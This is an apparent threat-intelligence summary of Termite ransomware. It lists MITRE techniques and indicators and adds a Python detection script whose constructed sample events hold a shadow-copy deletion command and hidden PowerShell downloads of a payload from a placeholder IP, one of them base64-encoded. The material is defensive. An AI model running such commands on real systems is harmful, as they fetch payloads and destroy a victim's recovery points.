Emulating the Infestive Termite Ransomware

Termite ransomware, which emerged in November 2024, carries out targeted attacks that begin with phishing or the exploitation of vulnerable software and combine data theft with file encryption. Its attack on Blue Yonder disrupted global supply chain operations. The encryptor is derived from Babuk source code and adds steps, such as shadow copy deletion, that are meant to deny recovery. (Affected: Supply chain, multiple industries, global corporations)

Keypoints :

  • Termite ransomware surfaced in November 2024 as a highly targeted threat impacting multiple sectors.
  • Initial access commonly gained via phishing, compromised sites, or software vulnerabilities.
  • Employs double extortion by encrypting files and exfiltrating data to pressure victims.
  • Derived from Babuk ransomware code, with modifications tailored to the victim environment.
  • Notably disrupted Blue Yonder, a global supply chain management provider, causing widespread impact.
  • Some overlap with CL0P ransomware activity has been observed, but no connection between the groups has been confirmed.
  • AttackIQ released an emulation assessment template to help security teams test defenses against Termite.
  • Key tactics include Ingress Tool Transfer, system and process discovery, and shadow copy deletion.
  • Files on local drives and network shares are encrypted with ChaCha20, with key exchange via ECDH over Curve25519.
  • Detection and mitigation focus on monitoring native utility abuse and preventing recovery inhibition.

MITRE Techniques :

  • Ingress Tool Transfer (T1105) – Downloads and saves additional malware stages to disk or memory for further execution.
  • Query Registry (T1012) – Reads the MachineGUID value under HKLM\SOFTWARE\Microsoft\Cryptography to uniquely identify the system.
  • System Service Discovery (T1007) – Retrieves statuses of services using QueryServiceStatusEx and EnumDependentServices API calls.
  • Process Discovery (T1057) – Enumerates active processes using CreateToolhelp32Snapshot and iterates via Process32FirstW/Process32NextW.
  • Inhibit System Recovery (T1490) – Runs ‘vssadmin.exe’ to delete Volume Shadow Copies, removing the local restore points a victim could otherwise recover files from.
  • System Information Discovery (T1082) – Gathers hardware and system info using GetSystemInfo, FindFirstVolumeW, GetLogicalDrives, GetDriveTypeW API calls.
  • Network Share Discovery (T1135) – Enumerates accessible network shares via NetShareEnum API call.
  • File and Directory Discovery (T1083) – Enumerates files and directories using FindFirstFileW and FindNextFileW calls to locate targets for encryption.
  • Data Encrypted for Impact (T1486) – Encrypts targeted files in place using ChaCha20, with the file keys protected by ECDH over Curve25519.

Indicator of Compromise :

  • The article highlights command-line patterns in which native tools such as ‘vssadmin.exe’ are run with the arguments that delete shadow copies: a reliable IOC for ransomware activity.
  • PowerShell and CMD command lines that invoke web requests (for example ‘Invoke-WebRequest’) to download payloads are behavioral IOCs, and the resulting outbound connections are the corresponding network IOCs.
  • Reads of the MachineGUID registry value are a behavioral IOC for host fingerprinting, but they are only visible with telemetry that records registry reads; command-line logging catches them only when ‘reg.exe’ is used.
  • The article gives no IP addresses or file hashes; detection relies on the usage patterns of the Windows API calls and system utilities that Termite abuses.
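As an added example (not code from the article or from the AttackIQ assessment template), the Python script below applies the command-line patterns listed above to constructed process-creation events shaped like Sysmon Event ID 1 / Security 4688 records. It flags vssadmin shadow copy deletion (T1490), PowerShell download cmdlets (T1105) and ‘reg.exe’ queries for MachineGUID (T1012), and, as an addition the article does not discuss, decodes a PowerShell -EncodedCommand argument before matching so that an encoded Invoke-WebRequest is not missed. All sample events, the address 203.0.113.10 and the parent process name termite.exe are constructed for this example.

```python
from __future__ import annotations

import base64
import re
from dataclasses import dataclass

# Constructed process-creation records shaped like Sysmon Event ID 1 / Security 4688
# events (Image, ParentImage, CommandLine). Sample data for this example only, not
# real Termite telemetry; the parent name "termite.exe" and the IP are made up.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\vssadmin.exe",
     "ParentImage": r"C:\Users\Public\termite.exe",
     "CommandLine": "vssadmin.exe Delete Shadows /All /Quiet"},
    {"Image": r"C:\Windows\System32\vssadmin.exe",          # benign admin use
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "vssadmin list shadows"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'powershell -nop -w hidden -c "Invoke-WebRequest -Uri '
                    'http://203.0.113.10/stage2.bin -OutFile C:\\Users\\Public\\s2.exe"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",             # benign
     "CommandLine": "powershell Get-Date"},
    {"Image": r"C:\Windows\System32\reg.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'reg query "HKLM\SOFTWARE\Microsoft\Cryptography" /v MachineGuid'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Users\Public\termite.exe",
     # Same download hidden behind -EncodedCommand (base64 of the UTF-16LE script).
     "CommandLine": "powershell.exe -NoP -W Hidden -Enc " + base64.b64encode(
         "Invoke-WebRequest http://203.0.113.10/x.bin -OutFile x.exe".encode("utf-16-le")
     ).decode("ascii")},
]


@dataclass(frozen=True)
class Rule:
    name: str
    technique: str
    image: re.Pattern    # matched against the image file name (basename only)
    cmdline: re.Pattern  # matched against the (expanded) command line


RULES = [
    Rule("Shadow copy deletion via vssadmin", "T1490",
         re.compile(r"^vssadmin\.exe$", re.I),
         re.compile(r"\bdelete\s+shadows\b", re.I)),
    Rule("PowerShell web download cmdlet", "T1105",
         re.compile(r"^(powershell|pwsh)\.exe$", re.I),
         re.compile(r"\b(Invoke-WebRequest|iwr|Invoke-RestMethod|irm)\b", re.I)),
    Rule("MachineGuid lookup via reg.exe", "T1012",
         re.compile(r"^reg\.exe$", re.I),
         re.compile(r"\bquery\b.*Microsoft\\Cryptography.*\bMachineGuid\b", re.I)),
]

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def basename(path: str) -> str:
    """Return the file name part of a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1]


def expand_encoded(cmd: str) -> str:
    """Append the decoded form of an -EncodedCommand argument, if present, so the
    rules see the real script and not just the base64 wrapper."""
    m = ENC_RE.search(cmd)
    if not m:
        return cmd
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmd  # not valid base64 / UTF-16LE: leave the line as it was
    return cmd + " " + decoded


def evaluate(event: dict) -> list[tuple[str, str]]:
    """Return (technique, rule name) for every rule the event matches."""
    img = basename(event.get("Image", ""))
    cmd = expand_encoded(event.get("CommandLine", ""))
    return [(r.technique, r.name) for r in RULES
            if r.image.search(img) and r.cmdline.search(cmd)]


def scan(events: list[dict]) -> list[dict]:
    """Run every rule over every event and collect findings with their context."""
    findings = []
    for i, ev in enumerate(events):
        for technique, name in evaluate(ev):
            findings.append({"index": i, "technique": technique, "rule": name,
                             "parent": basename(ev.get("ParentImage", "")),
                             "cmdline": ev.get("CommandLine", "")})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f['technique']}] {f['rule']} (parent={f['parent']}): {f['cmdline'][:90]}")
```

Run as-is, the script reports four findings (the vssadmin deletion, both Invoke-WebRequest variants and the reg.exe query) and stays silent on the benign ‘vssadmin list shadows’ and Get-Date lines. Two caveats for production use: Termite itself reads MachineGUID through the registry API rather than ‘reg.exe’, so the T1012 rule only supplements EDR registry-read telemetry; and the parent process carried in each finding is the field worth pivoting on, since vssadmin spawned by an unsigned binary in a user-writable directory is far more suspicious than the same command launched from an administrator's shell.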


Read more: https://www.attackiq.com/2025/05/08/emulating-termite-ransomware/